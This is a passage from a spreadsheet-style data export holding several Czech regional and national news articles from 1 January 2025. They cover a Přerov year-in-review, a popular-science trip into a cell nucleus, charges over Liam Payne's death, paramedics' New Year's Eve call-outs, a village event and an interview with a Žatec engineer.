rukama vyrobili podzimní ozdoby. Nechyběla dýňová polévka a sušenky od žáků Střední školy gastronomie a služeb. Přístupný byl také radniční dvorek a přízemí radnice, kde nechyběla výzdoba ve strašidelném duchu. V hlasování o nejkrásnější dýni si nejlépe vedly výtvory dětí ze Základní školy Boženy Němcové. Loňské výročí městského parku připomněl i přerovský land art – náměstí TGM se opětovně proměnilo v unikátní přírodní koberec. Kompozici tvořila číslice 120, nápis MichaLOVE a asymetricky poskládané listy ze stromů, které se v Michalově nejčastěji vyskytují. Do tvorby se zapojily děti z mateřských i základních škol, kolemjdoucí, pomáhali i studenti Gymnázia Jakuba Škody . Radar, který dohlíží na bezpečnost v místní části Přerova Lověšicích , někdo zlikvidoval střelnou zbraní. Škoda na zařízení činila kolem 1 milionu 700 tisíc korun. Někteří nezodpovědní řidiči pak v neměřeném úseky přestali dodržovat povinnou padesátku, na zhoršenou dopravní situaci si stěžovali i řidiči městských autobusů. Městu nakonec vyšla vstříc obec Kokory, která Přerovu přenechala svou „skříň“ na radar a mohlo se zase začít měřit. Město Přerov zkrášlí na jaře další pestrobarevné cibuloviny – pokvetou na rondelu u Strojaře, ale také na nábřeží Rudolfa Lukaštíka a Protifašistických bojovníků. V minulosti byly jarními květinami osázeny i tyto lokality: náměstí Svobody , náměstí Přerovského povstání, prostranství u kina Hvězda, ulice Pod Valy, Šířava, Želatovská, Teličkova a Velká Dlážka. Lilie pak mohou lidé obdivovat v ulicích Spálenec a Želatovská . Listopad Přerovští dobrovolní hasiči, kteří jsou aktivní a nápomocnou složka města, dostali novou cisternovou stříkačku. Přišla na téměř 10 milionů korun a městu se na nákup podařilo získat dotaci z Ministerstva vnitra ve výši 4 miliony korun. Nové vozidlo tak nahradilo svého 17 let starého předchůdce. Prošlé potraviny, zbytky jídel, ale třeba i čajové sáčky či kávová sedlina nebudou v Přerově ani v tomto roce končit v odpadkových koších nebo toaletních mísách. Pilotní projekt třídění gastroodpadu, který byl zahájen v roce 2022, bude pokračovat. Město nechalo rozmístit do vytipovaných míst nejprve dvacet a následně dalších deset kusů odpadových nádob o objemu 120 litrů. Zkušební období ukázalo, že lidé službu využívají. Za likvidaci gastroodpadu město pro letošní rok zaplatí 230 tisíc korun. Svatomartinským vínem byl pokřtěn kalendář města Přerova na rok 2025. Skrze objektiv amatérských i profesionálních fotografů ukazuje krásy města, jeho pyšné dominanty i skrytá zákoutí. Kmotrem se stal přerovský primátor Petr Vrána, který kalendáři popřál, aby se novým majitelům líbil a dělal jim celých dvanáct měsíců radost – ať už ho budou mít na pracovním stole, nebo pověšený na zdi. Role dalších kmotrů se zhostili náměstci primátora Tomáš Navrátil , Vladimír Lichnovský , radní Jakub Navařík a nejmladší z autorů fotografií Tobiáš Macháček. Sada kalendářů je stále v prodeji v Městském informačním centru za 200 korun. Radnice ocenila celkem 109 žáků, jejichž třídy se zúčastnily celorepublikové Výzvy Pěšky do školy a umístily se na první třech místech v rámci Přerova . Děti obdržely voucher do kina Hvězda. Nejlépe si vedli žáci z 8. B ze Základní školy Želatovská , kteří získali zlato v kraji a 18. místo v rámci celé České republiky . Prosinec První adventní neděle se nesla v duchu tradičních akcí – přesně v 18 hodin rozsvítil primátor města Petr Vrána společně s dětmi, které si v loňském roce převzaly sošku Scholar, strom na náměstí TGM . Ten loňský pocházel přímo z Přerova , vyrostl v areálu Opravny železničních kolejových vozidel v Husově ulici, kde už neměl další prostor k růstu. Ponořit se do poetiky Ladovských Vánoc měli možnost návštěvníci adventní výstavy v Galerii města Přerova. Ještě před zahájením programu ale mohli děti navštívit Vánočně taneční maskování v Městském domě, které pro ně přichystalo město. Tisíce lidí si nenechaly ujít Mikulášský průvod, který prošel městem. Nechyběli v něm andělé na koních, ani Krampusáci z Krkonoš . Situaci ale zkomplikovali přihlížející lidé, kteří vstupovali do trasy průvodu. Kdo se chtěl setkat s tradiční trojicí s „českým“ čertem měl možnost také – děti, které na náměstí TGM řekly Mikulášovi básničku, dostaly malý dárek. Kdo přišel na strašidelné Krampusáky, užil si jejich hodinovou show. Adventní program rozproudil také Předmostí. Na náměstíčku v Hranické ulici to ožilo pod taktovkou Jana Jakeše. Vůbec poprvé se tak mohli lidé z největšího přerovského sídliště scházet a užívat si adventní čas s horkým punčem a bramboráky přímo mezi paneláky. Nechyběl ani komponovaný program Andělské Vánoce – speciální kamion nabídl dětem dvě hodiny her, soutěží a písniček. (voj) Autor: Lenka Chalupová Autor person Lenka Chalupová</t>
  </si>
  <si>
    <t>1510</t>
  </si>
  <si>
    <t>1630</t>
  </si>
  <si>
    <t>20250101_211_3695312470_13590ab5dc10a87b8437.html</t>
  </si>
  <si>
    <t>13590ab5dc10a87b8437</t>
  </si>
  <si>
    <t>Poněkud dadaistický výlet do nitra genetické informace</t>
  </si>
  <si>
    <t>Poněkud dadaistický výlet do nitra genetické informace Prosím, přijměte mé pozvání na výlet do nitra vaší genetické informace. V jednom ze svých článků, nazvaném Obyčejné slepičí vejce a kámen mudrců , jsem se zamýšlela nad definicí života. Zabývala jsem se otázkami, jaký je rozdíl mezi živou a neživou hmotou, a také tím, co charakterizuje živé organismy a jaký je jejich původ. Uvedla jsem, že klíčovým prvkem pro zachování života na Zemi i v nás samotných jsou bílkoviny neboli proteiny. V článku jsem vysvětlila, že proteiny vznikají přepisem genetické informace a nejenže tvoří základní strukturu živé hmoty, ale doslova jí vdechují život. Díky proteinům živá hmota vyrábí energii, bez níž by nemohla existovat, identifikuje se jako živá a rozmnožuje se. Jinými slovy, proteiny určují, jak vypadáme, jak fungujeme, jak myslíme a kdo jsme. Jsou základem všeho, co si o sobě dokážeme představit. A vše podstatné, co si dokážeme o proteinech představit, je zase definováno v genetické informaci (pomineme-li kupříkladu epigenetické modifikace, ale o těch někdy jindy). Pojem „informace“ pochází z latinského informatio , které původně znamenalo vtisknutí formy či tvaru, tedy proces utváření. Tento význam je ve vztahu ke genetické informaci, o níž se chci v dnešním článku zmínit, velmi výstižný. Genetická informace se totiž přenáší podobně jako tisk – jedna molekula slouží jako předloha pro vytvoření druhé. Obecně je známé, že genetická informace je uložena v molekule DNA, která má podobu dlouhého dvojvlákna stáčeného do spirály. Někteří lidé však také slyšeli, že genetická informace se nachází v chromozómech, a jiní zase slyšeli, že se nachází jak v DNA, tak chromozómech, tak dokonce i v genech. A co se týče genů, tak ty jsou v učebnicích genetiky zase šalamounsky zmiňovány jako nějaké „jednotky genetické informace“. Jak toto vysvětlit? Výsledkem je, že pro mnohé zůstává genetická informace až nepříjemně abstraktním pojmem, a to, jak uvidíte dále, zcela zbytečně. Na úvod bych ráda vysvětlila, že genetická informace není nic jiného než návod. Návod na to, jak mají vypadat naše bílkoviny – tedy jaké mají mít aminokyselinové složení – a také kdy, kde a v jakém množství se mají vytvářet. A je genetická informace skutečně tak abstraktní? Podle mě ne. Stačí jen změnit úhel pohledu, a všechno začne dávat větší smysl. Prosím, přijměte můj letmý a poněkud dadaistický výlet do nitra našich buněk, resp. do buněčného jádra, v němž se naše genetická informace v podobě DNA, chromozomů, i genů ukrývá. Vzhůru do buněčného jádra Alenka sedí se svou sestrou na břehu řeky. Sestra si čte a Alenka se nudí. V tom si všimne kolem běžícího Bílého Králíka, který kouká na hodinky a běduje, že jistě přijde pozdě. Sleduje ho do králičí díry a skočí tam za ním. No, a vy jste se právě ocitli uvnitř jedné z vašich buněk – té na úplném konci malíčku vaší levé nohy. Proč právě tam? Dopřejme této nenápadné a často přehlížené buňce na periferii vašeho těla alespoň chvilku slávy. Zaslouží si to, jak brzy sami zjistíte. Takže, momentálně stojíme uvnitř této buňky, vy a já, a čekáme na našeho průvodce, který se jmenuje ATM (ataxia telangiectasia mutated). Než se ale vydáme na cestu, dovolte mi uvést pár základních informací. Abychom se lépe orientovali, převedeme si všechny velikosti a vzdálenosti do měřítek, která jsou pro nás srozumitelnější – do centimetrů a metrů, ve skutečnosti však odpovídajícím nanometrům a mikrometrům. Začněme tedy rozměry: průměrná lidská buňka má v přepočtu průměr 500 metrů (ve skutečnosti 50 µm) a její jádro, kde je uložena genetická informace, dosahuje průměru 50 metrů (5 µm). Představte si tedy obrovskou kouli o průměru 500 metrů a v jejím středu menší kouli o průměru 50 metrů. Právě tam se za chvíli podíváme. A teď to podstatné – uvnitř jádra se nachází molekuly DNA. Molekula DNA je vlákno s tloušťkou pouhých 10 cm (10 nm), přitom však je to vlákno velmi dlouhé. Tipnete si, jak dlouhé? Nebojte se přidávat, protože je to opravdu hodně. Je to 2000 km (reálně 2 metry)! Ano, v prostoru jádra o průměru 50 metrů je smotáno vlákno dlouhé jako „cesta z Prahy do Madridu “. Dále, podobně jako švadlenka má uloženy stovky metrů nití v malých špulkách, tak jsou i vlákna DNA uspořádána do „špulek“, a těmto špulkám říkáme chromozomy. Ovšem s jedním rozdílem – vlákno DNA není navinuto přes sebe jako nit na špulce, ale na každém konci chromozomu volně čouhá konec DNA. Většinu času, kdy buňka neprochází dělením, je DNA v chromozomech rozvolněná a snadno přístupná enzymům, které přepisují genetickou informaci do bílkovin. Pokud se však buňka připravuje na dělení, DNA se vždy natěsno smotá a vytvoří krátké, tlusté „balíčky“ zvané mitotické chromozomy, které dosahují tloušťky kolem 14 metrů (1400 nm), viz obrázek. Dnes ale nenavštívíme buňku připravující se na dělení. Místo toho si prohlédneme buňku v klidovém stavu, takzvané interfázi, kdy probíhá přepis genetické informace – proces, který nás bude zajímat nejvíce. A vidím, že Ataxia telangiectasie mutated, naše průvodkyně už si jde pro nás. Nicméně, její jméno je trošku zapeklité, takže ji budu říkat, třeba….Světlana. Světlana má v našem měřítku jen pouhých 7 cm (7 nm), což nevypadá moc, ale zdání klame. Světlana je totiž velitelkou party hlídačů genetické informace, která neustále skenuje DNA, a to tak, aby odhalila případné defekty, které na DNA z nejrůznějších důvodů mohou nastat. Pokud tito hlídači na DNA objeví problém, okamžitě vydají rozkaz k její opravě. Genetická informace totiž musí být v perfektním stavu – poškození DNA totiž může vést k poruchám funkcí buňky, nádorovému bujení, nebo dokonce k programované buněčné smrti. Teď už se ale připravme, protože náš fascinující výlet za tajemstvím buněčného života právě začíná! A pojďme rychle, protože Světlana na nás energicky mává, ať se postavíme do fronty k jednomu z jaderných pórů – vstupních bran do jádra. Sama k nám běží s úsměvem na tváři. Když dorazí, vzájemně se představíme. Musím říct, že na to, jak vysokou funkci Světlana má, že vypadá velmi dobrosrdečně a mile. Stojíme ve frontě a vy si mezitím prohlížíte povrch jádra. Je fascinující, kolik vstupů do jádra existuje – zhruba 3000! Přesto je u každého doslova nával. Jedním pórem projde za sekundu až tisíc molekul, většinou proteinů. Sotva jsme se zařadili do fronty, už se za námi začalo kupit celé srocení dalších molekul, a zrovna takových podobných Světlaně. Vy se ohlížíte a zkoumavě si je prohlížíte. „To jsou nováčci našeho týmu, posily přímo z ribozomů,“ vysvětluje Světlana. Na vaši otázku, co ribozomy vlastně jsou, Světlana odpovídá, že jde o továrny na výrobu proteinů. Ribozomy se sice nacházejí uvnitř buňky, ale vně buněčného jádra. Dále Světlana popisuje, že proteiny jsou řetězce aminokyselin, které se vyrábějí právě v ribozomech. Po opuštění ribozomů se tyto řetězce stáčejí do složitých třírozměrných struktur, tak, aby poté v buňce mohly plnit své specifické funkce. Světlana ještě zamýšlí říct něco organizačního svým kolegyním, když v tom na nás od vchodu póru mává člen ochranky, kterému se říká nukleoporin, a pobízí nás, ať přistoupíme ke vstupní kontrole. „Skoro jako pasová a celní kontrola,“ říkám si trochu nervózně. Světlana se však se strážcem čemusi žoviálně smějí a jejich přátelská atmosféra mě uklidňuje. Těsně před vstupem do póru nás Světlana varuje: „Dejte si pozor na hlavu!“ I když, Světlana je decentní, spíš, než na hlavu asi v mém případě myslela na něco jiného, protože otvorem se budeme muset proplazit. Otvor póru je na mě opravdu úzký, jen 9 cm (9nm). Každý z nás dostane svého průvodce, který nám pórem pomůže projít. Nejprve se vydává Světlana, za ní jdete vy. Přiznávám, že jsem trochu nervózní. Ke všemu mi teď dává hlídač pokyn, abych se zastavila a před sebe pustila dvě molekuly ATP, které do póru vlítnou trochu jako torpéda. Pro ty, kdo znají můj předchozí článek, jen připomenu – ATP je univerzální „palivo“ buňky na výrobu její energie, bez níž by žádný z buněčných procesů, ani náš život, nebyl možný. Molekuly ATP jsou drobné, jen asi 7 mm (0,7 nm), takže pórem projdou hladce a rychle. A teď jsem na řadě já – držte mi palce! Ovšem, ještě než vstoupím, zahlédnu záblesk hemžící se hordy molekul mRNA, které se jako dlouzí, zkroucení hadi svižně proplétají póry z jádra ven. Na svých „řetízcích“ přenášejí genetickou informaci směrem k ribozomům, aby se tam začaly tvořit proteiny. „Jasně, tyhle molekuly míří do ribozomů na výrobu proteinů,“ říkám si pro sebe. Ale není čas se déle zdržovat – hlídač už na mě gestikuluje, že mám jít dál. Můj průvodce, protein importin, mě pevně chytí a začne mě táhnout pórem dovnitř. Musím přiznat, že s tím má dost práce – neprocházím úplně hladce. Trochu se stydím, ale nakonec jsem konečně uvnitř. Vy i Světlana mě čekáte hned u vstupu a oba se na mě podezřele usmíváte. „No nic, hlavně, že už to mám za sebou,“ pomyslím si úlevně. Po několika vteřinách, když se trochu uklidním, mi začne docházet, kde se vlastně nacházím. Jsem naprosto ohromená. „Tady je ale hlomoz, co?“ obracím se na vás. Přikyvujete a dodáváte, že nic podobného jste ještě nezažili. „Buněčné jádro je vlastně největší továrna na světě,“ říkáte. „A taky nejmenší,“ doplním s úsměvem. Společně se zasmějeme, i když na tom vlastně není nic přehnaně vtipného – je to jednoduše pravda. Váš pohled ale rychle upoutají mohutná lana, asi 30 cm široká, která křížem krážem vyplňují prostor jádra. Jejich konce jsou zavěšeny na stěnách jádra a působí monumentálně. „To budou chromozomy, že?“ ptáte se a ukazujete na lana. „Přesně tak,“ odpovídá Světlana. Světlanino vysvětlení jde do detailů: vlákno DNA, široké 10 cm (10 nm), je podél své délky obtočeno kolem malých proteinových kuliček, velkých 2 cm (2 nm). Výsledek připomíná šňůrku s navlečenými korálky . Tato šňůrka je dále spirálovitě smotaná do 30cm lana, které se v některých částech stáčí ještě dále, a to na šířku 3 metrů (300 nm). „Ty proteinové kuličky se nazývají histony,“ vysvětluje Světlana. „Díky nim zůstává vlákno DNA v chromozomech kompaktně smotané. Chromozomy jsou vlastně kombinací bílkovin a DNA – bílkoviny zajišťují, že DNA v chromozomech drží pěkně pohromadě.“ Najednou vás na jednom z lan, hned vedle vás, něco zaujme. Přistoupíte blíž, začnete si lano důkladně prohlížet, osaháváte ho a pomalu otáčíte v rukách. „Copak vás tak zaujalo?“ usměje se Světlana. „Podívejte,“ znalecky ukážete na vlákno uvnitř lana. Všimnete si totiž, že vlákno DNA je tvořeno čtyřmi různými typy drobných zrníček, a že každé to zrníčko má průměr asi 3 mm (0,3 nm). Zrníčka jsou poskládaná za sebou v různém pořadí. „Ano, přesně tak,“ přikyvuje Světlana, „to jsou nukleotidy – základní stavební kameny genetické informace. A když se na vlákno DNA podíváte ještě pozorněji, uvidíte, že každé zrníčko má na sobě vyryté písmeno: A (adenin), G (guanin), C (cytosin) nebo T (tymin). Pořadí těchto písmen není náhodné.“ doplňuje Světlana a nato vám podá lupu. Vezmete si ji a přiblížíte ji k vláknu, abyste si nukleotidy mohli prohlédnout zblízka. „A proč ty názvy?“ ptáte se. „To je klíč k celé genetické informaci,“ vysvětluje Světlana. „Každé tři za sebou jdoucí nukleotidy tvoří genetický kód pro jednu aminokyselinu. Například tady stojíme u genu pro hemoglobin. Tady ten gen začíná,“ ukáže na určité místo na laně. „Zkuste mi přečíst první trojici nukleotidů, “ vybídne vás Světlana a vy skloníte hlavu, přiblížíte lupu k lanu a čtete: „Adenin, guanin, cytosin.“ „Přesně tak,“ přikyvuje Světlana. „Tahle trojice kóduje aminokyselinu lysin. A podobně, každá další trojice nukleotidů určuje jinou aminokyselinu. Trojice za trojicí, aminokyselina za aminokyselinou, a tak vznikají celé bílkovinné řetězce.“ Světlana ukáže na další chromozóm kousek dál: „Podívejte, tam je gen pro kolagen. Ten je v naší kožní buňce velmi aktivní.“ „Vidíte ty malé přadleny?“ ukáže poté na proteiny pohybující se podél vlákna DNA. „To jsou RNA polymerázy. Podle pořadí nukleotidů ve vlákně DNA vytvářejí vlákno mRNA. A tohle vlákno mRNA pak opustí jádro buňky, zamíří do ribozómů, kde se překládá do aminokyselin. Ty se postupně řetězí a vzniká bílkovina. Celý tento proces je základ života.“ Světlana se směje, zatímco vy fascinovaně sledujete dění kolem. V hlavě vám stále zní myšlenka: Tohle všechno se odehrává uvnitř našich buněk, neustále, 24 hodin denně, 7 dní v týdnu, a přitom si to vůbec neuvědomujeme. Náhle vás z vašich myšlenek vytrhne křik. Proteiny ze Světlanina týmu gestikulují a volají na ni, ať za nimi okamžitě jde. Zrychleně vykřikují něco o vážném poškození a blížící se apokalypse. „To bude asi apoptóza, programovaná buněčná smrt,“ napadne vás. Světlana se rychle loučí a mizí ve víru událostí, zatímco my pro všechny případy rychle opouštíme buňku. Venku se nadechujeme čerstvého vzduchu a já slyším, jak říkáte: „Nezajdeme na pivo ? Když je venku tak hezky?“ „Jasně,“ přitakávám s úsměvem. Tak jdeme! Šťastný nový rok vám přeji! autor: Radmila Čapková Frydrychová (radmila.frydrychova@seznam.cz), další články autorky na jejím autorském profilu: https://medium.seznam.cz/autor/theodora-14999</t>
  </si>
  <si>
    <t>20250101_212_3695321312_146e9ca3889f771b6f58.html</t>
  </si>
  <si>
    <t>146e9ca3889f771b6f58</t>
  </si>
  <si>
    <t>Ze smrti Liama Payna bylo obviněno pět lidí, dva z nich zpěvákovi údajně dodávali drogy Argentinský soudce potvrdil obvinění pěti lidí v souvislosti se smrtí Liama Payna, bývalého člena hudební skupiny One Direction . Soud dvěma z nich nařídil preventivní vězení za to, že mu dodávali drogy. Buenos Aires 11:12 1. ledna 2025 Zpěvák Liam Payne zemřel ve věku 31 let | Foto: Charles Platiau | Zdroj: Reuters Podle americké stanice NPR je jednou ze dvou osob, na které byla nařízena preventivní vazba (forma vyšetřovací vazby), je zaměstnanec hotelu v Buenos Aires , kde Payne pobýval až do své smrti po říjnovém pádu z balkonu svého pokoje. Druhou osobou byl číšník, s nímž se Payne seznámil v restauraci. Policista, který si přál nebýt jmenován jako podmínku, aby mohl hovořit o rozsudku, uvedl, že oba čelí obvinění z dodávání drog a musí se dostavit k soudci. Další tři osoby z neúmyslného zabití, včetně podnikatele, který byl s Paynem v Argentině , a dvou manažerů hotelu. Úředník uvedl, že jim nebyla nařízena preventivní vazba. Soudkyně Laura Bruniardová podle BBC uvedla, že si nemyslí, že první tři jmenovaní plánovali nebo chtěli Paynovu smrt, ale jejich jednání ohrozilo zpěvákův život. 31 letý Payne spadl 16. října z balkonu svého pokoje ve třetím patře hotelu v luxusní čtvrti Palermo v argentinském hlavním městě. Podle pitvy zemřel na následky mnohačetných zranění a vnějšího krvácení. Jeho pohřeb se konal 20. listopadu v britském Amershamu severozápadně od Londýna . Prokurátoři uvedli, že Payneovo toxikologické vyšetření ukázalo, že v jeho těle byly v době před smrtí „stopy alkoholu , kokainu a předepsaného antidepresiva.“ Payneova pitva ukázala, že jeho zranění nebyla způsobena sebepoškozením ani fyzickým zásahem jiných osob. V dokumentu také stojí, že se při pádu nechránil, což naznačuje, že mohl být v bezvědomí. Argentinská prokuratura také vyloučila, že by Payne zemřel sebevraždou. Autor: Jiří Klečka Autor Jiří Klečka</t>
  </si>
  <si>
    <t>20250101_213_3695322242_4ecf940067f6df5d6a0c.html</t>
  </si>
  <si>
    <t>4ecf940067f6df5d6a0c</t>
  </si>
  <si>
    <t>Silvestrovská noc záchranářů. Vyjížděli k potyčkám, opilým i dopravním nehodám</t>
  </si>
  <si>
    <t>Silvestrovská noc záchranářů. Vyjížděli k potyčkám, opilým i dopravním nehodám 1. ledna 2025 11:06 Silvestrovské služby jihočeských záchranářů tradičně patří mezi ty nejrušnější z celého roku. Jen v noci řešili 121 událostí. V 19 případech sehrál hlavní roli alkohol , dalších šest lidí se zranilo při vzájemných potyčkách. Ošetřit potřeboval i muž na Lipně , kterému explodovala pyrotechnika v ruce. Byl to jediný hlášený silvestrovský úraz zábavní pyrotechnikou. Diskuse (0 příspěvků) Sdílet článek ilustrační snímek | foto: ZZS Ústeckého kraje Záchranáři společně s hasiči ve 21 hodin vyjížděli na pomoc muži v krajském městě, který pod vlivem alkoholu spadl do potoka a nebyl schopen se vlastními silami z vody dostat. „Ve vodě strávil minimálně dvacet minut a byl podchlazený. Po ošetření namístě a zajištění tepelného komfortu jej zdravotníci předali do péče kolegům z urgentního příjmu budějovické nemocnice,“ zmínila mluvčí jihočeských záchranářů Petra Kafková. Doplnila, že všechna lůžka na protialkoholní záchytné stanici v Budějovicích se zaplnila už již třicet minut po půlnoci. Poslední den v roce posádky Zdravotnické záchranné služby Jihočeského kraje také u devíti dopravních nehod. Ke střetu tří osobních aut u Studánek na Krumlovsku, při níž se zranili tři lidé, kolem půlnoci vyjely tři pozemní posádky a vzlétl vrtulník. „Muže středního věku, který při nehodě utrpěl těžké zranění v oblasti hlavy a pánve, záchranáři zajistili žilní linkou, podali potřebné léky a imobilizovali krčním límcem, pánevním fixátorem a uložením do celotělové vakuové matrace,“ uvedla Kafková. Vrtulník zraněného transportoval na traumacentrum českobudějovické nemocnice. Tam byla po poskytnutí obdobné péče transportována i druhá těžce zraněná osoba, sedmapadesátiletá žena, s podezřením na poranění v oblasti hrudníku, břicha a pánve. Třetí zraněnou byla žena středního věku. Utrpěla středně závažné poranění horní končetiny a hrudníku. Po poskytnutí přednemocniční neodkladné péče ji záchranáři předali do českokrumlovské nemocnice. Autor: pet Metro.cz Kam dál? První jihočeské miminko se narodilo v Písku . Holčička se jmenuje Tereza Ohňostroje v Německu mají pět obětí, hlášeny jsou útoky na záchranáře V Pardubickém kraj na silvestra zranění při požáru bytu, záchytka byla plná Témata: bezpečnost , Okres České Budějovice | Aktuální zprávy, články a informace , nemocnice , Silvestr , Dopravní nehody , Zprávy z Českých Budějovic a okolí , Zdravotnická záchranná služba Jihočeského kraje , Nemocnice České Budějovice Vstoupit do diskuse (0 příspěvků) Sdílet článek Autor: Eva Petrová Autor Eva Petrová Rubrika transition_slide Metro - Jihočeský kraj</t>
  </si>
  <si>
    <t>20250101_214_3695269396_d32c7777fd5865144ae0.html</t>
  </si>
  <si>
    <t>d32c7777fd5865144ae0</t>
  </si>
  <si>
    <t>V křenovickém Lesním divadle si uspořádali Předsilvestr</t>
  </si>
  <si>
    <t>V křenovickém Lesním divadle si uspořádali Předsilvestr 1.1.2025 11:04 KŘENOVICE - Lesní divadlo v Křenovicích na Písecku pozvalo v neděli 29. prosince malé i velké na akci Předsilvestr 2024. Lesní divadlo, které bylo znovuotevřeno v srpnu 2024, otevřelo celý svůj prostor pro setkání a popovídání sousedů, přátel a známých z Křenovic a okolí. Pro účastníky byl připraven krátký kulturní program, kde v úvodu zazpívaly koledy Libuše Vlnová a Olga Kolísková. Poté následoval silvestrovský taneček skupiny hasiček z Křenovic a přišel i klaun v podání Michala Góče. Nakonec starosta obce Josef Hrůza všem popřál mnoho štěstí a zdraví do nového roku. Krásné slunečné počasí přilákalo do divadlo na 70 návštěvníků včetně rodin s malými dětmi. Všichni si zde na otevřených ohních opekli buřty, zahřáli se svařeným vínem nebo čajem a ochutnali silvestrovské pochutiny, které si lidé sami přinesli. Nejvíce si snad toto odpoledne užily děti, které zde dostaly silvestrovské čepičky, frkačky, balónky či fosforeskující náramky. Celou akci uspořádali přátelé lesního divadla pod záštitou obce Křenovice a křenovických hasičů. Vánoční atmosféru lesního divadla navodily kulisy Betléma , Tří králů a dvou andělů, které namalovali žáci výtvarného oboru Základní umělecké školy Milevsko pod vedením učitelky Lenky Lešňovské. Kulisy jsou umístěny u podia v lesním divadle. V lesním divadle také končí letošní Vánoční andělská stezka, kterou připravily křenovické hasičky. Má název Vánoční zvyky, začíná u křížku směrem do Lesního divadla a stezku je možné projít až do Tří králů. Autor: Olga Kolísková Autor: Olga Kolísková Autor person Olga Kolísková</t>
  </si>
  <si>
    <t>11570</t>
  </si>
  <si>
    <t>20250101_215_3695260116_ca6777e1906cf9af16af.html</t>
  </si>
  <si>
    <t>ca6777e1906cf9af16af</t>
  </si>
  <si>
    <t>Tajnej rada, pivní inženýr a vědátor</t>
  </si>
  <si>
    <t>Tajnej rada, pivní inženýr a vědátor Aleš Stroukal 2025-01-01 10:58:00 Zprávy, Rozhovory Martin BENEŠ ze Žatce je mladý muž vysoké štíhlé postavy a já, když někdo někde vysloví jeho jméno, ho vždy vidím v bílém laboratorním plášti na sobě, který k němu patří stejně tak jako ke kytaristovi Guns N‘ Roses Slashovi vysoký klobouk nebo ke kytaristům skupiny ZZ Top dlouhé plnovousy. Ahoj Martine, když jsem se tě ptal, kde se spolu setkáme, tak nám oběma bylo jasné, že v hospodě, ale tys navrhl konkrétně předzahrádku minipivovaru Pioneer. Proč? Ahoj Aleši , představuji si, že se mnou povedeš kulervoucí sedmidílný životní rozhovor, ve kterém prozkoumáš nejtemnější zákoutí mé duše. A kde jinde se sejít, než právě tady, na Prokopáči, kde se kdysi formoval můj vztah k životu, chmelu a vůbec? Hele, nejsi na takový hluboký rozhovory moc mladej? Díky, Aleši , takový kompliment mi už dlouho nikdo nevysekl! Beru tě za slovo, za tímhle účelem se tu sejdeme za 42 let. Tak mi tedy pověz, co pro mě máš za otázky. Vezmu to hezky postupně od podlahy. Kdy a kde ses narodil? Předpokládám, že jsi rodilý žatečák. Přesně tak. Prý jsem byl počat při cvičení Štít 84 kdesi v Doupovských horách a po devíti měsících jsem se poprvé nadechl žateckého vzduchu. Pojď postupně probrat školy. Kam jsi chodil na základku a jaký jsi byl žák? První stupeň ZŠ jsem chodil na 5. ZŠ, druhý stupeň jsem chodil na Komeňák do matematické třídy a byl jsem hodný šprt. Ačkoliv i nějaký ten větší průser by se našel. Na jaké střední škole jsi studoval a jaký jsi byl student? V ústavní výchově jsem pokračoval na žateckém gymplu. Postupně jsem se učil mít věci na háku a užíval si ten všeobecný rozpuk (zejména spolužaček). Skvěle nám to v partě šlapalo, prostě zlatý časy! A do třetice – jakou vysokou školu jsi absolvoval, jaký máš titul a jaký jsi byl posluchač? Poslední vysvědčení jsem si odnesl z ČVUT v Dejvicích . Je na něm napsáno Ing. v oboru radiotechnika. První tři roky byly úplně zbytečný - asi jako pro vaši generaci vojna. Dodnes nevím, jak jsem to vydržel. Později už jsme začali řešit smysluplný věci, což mě bavilo. Po škole ses vrátil zpět do Žatce , což v dnešní době není úplně běžné. Co tě k tomu vedlo? Matička Praha mi tehdy nedokázala nabídnout čepovanou Žateckou 11°, což mé rozhodování o dalším životě velmi usnadnilo. Je fakt, že když se ohlédnu, tak si říkám, jestli jsem ještě hrdina, nebo už troska z Ústeckého kraje. Ale utéct umí každej. Po škole jsi nastoupil do své první práce. Do jaké firmy a co jsi měl na starost? Nastoupil jsem do ČEZu, do elektrárny v Tušimicích. Začínal jsem jako topič a strojník. Později jsem přešel na pozici technologa. Elektrárna procházela obnovou a já měl za úkol vyladit provoz nových turbín a kotlů, aby byl co nejspolehlivější. To zní, že jsi měl asi velký hračky, co? To si piš! Někteří chlapi si v garážích leští své výkonné motorčičky – cha! Já měl na starosti hned čtyři mašiny - a tisíckrát silnější! Zůstal jsi u jedné firmy nebo jsi své zaměstnání měnil? Jak roky plynuly, věcí k řešení ubývalo a rutiny přibývalo. Cítil jsem na sobě, že potřebuju změnu a rozhodl se odejít na volnou nohu. Co je vlastně tvé současné povolání? Můžeš to čtenářům nějak objasnit? Moji práci nejde zaškatulkovat, mám to rád pestré a vždycky mě bavilo dělat věci, o které se ještě nikdo nepokusil. Pohybuji se v energetice a mým hlavním zdrojem obživy je, velmi zjednodušeně řečeno, aby nenastal blackout. Takový stav si můžeš představit, jako když tě z ničeho nic srazí auto - během několika sekund jsi ve zcela nové situaci. Je důležité, aby v takovou chvíli dobře zareagovaly jak stroje v elektrárnách, tak i lidé, kteří budou poruchu řešit. A musí být dobře nastavená pravidla. Tomu se věnuji. Ale když zmiňuješ povolání, tak to je ještě něco víc než práce. Čím jsem starší, tím mě to více táhne od strojů k lidem. Mám koučovací výcvik, a kdo ví, kam mě život ještě zanese. Pamatuji si tě, Martine, téměř z každého Chmelfestu, kde jsi soutěžil v rámci Memoriálu Lojzy Lupulína, a to v týmu Pivní inženýři. Kolikrát jste jako Pivní inženýři soutěž vyhráli? Celkem čtyřikrát, naposledy v roce 2014. Můžeš zmínit jména kluků, kteří s tebou byli v týmu? Moc rád, Aleši . Kostra týmu byla složená z kamarádů ze základky – Ondra Dvořák, Karel Piwko, Michal Karabec. Když někdo nemohl, tak pohotově zaskakovali další borci jako Jirka Slach, Béďa Musel, Petr Pukl, Vašek Piwko… Součástí této pivní soutěže je i štafetové pití půllitru piva na ex. Za kolik vteřin, tedy správně za kolik sekund dokáže vypít jedno velké pivo Martin Beneš? Rekord mám okolo tří sekund, standard do 5 s. Ale kdysi jsem v jedné Brněnské putyce exoval malé pivo (tak tam říkali tupláku) za 8 sekund. Celkem jsem si tam získal respekt. Když už jsme u Chmelfestu, tak krásně navážeme na Chmelobranu, která vlastně Chmelfest pořádá. Od kdy jsi členem Chmelobrany? To ti řeknu přesně, od prosince 2008. A prozradíš, co pro tebe Chmelobrana vlastně znamená? Každý člen to vnímá jinak, ale pro mě je to především parta lidí, kteří sehráli v našem městě významnou roli v záchraně chmelařských památek. Může to vidět každý, kdo si vzpomene, jak vypadalo Náměstí Prokopa Velkého před 20 lety. Klíčové bylo vůbec upozornit na to, že tady máme unikátní chmelařské dědictví a přinést konkrétní návrhy, jak s ním naložit. Jednoho dne se Tajný rada, kterým byl od založení Chmelobrany Jirka Vaníček, 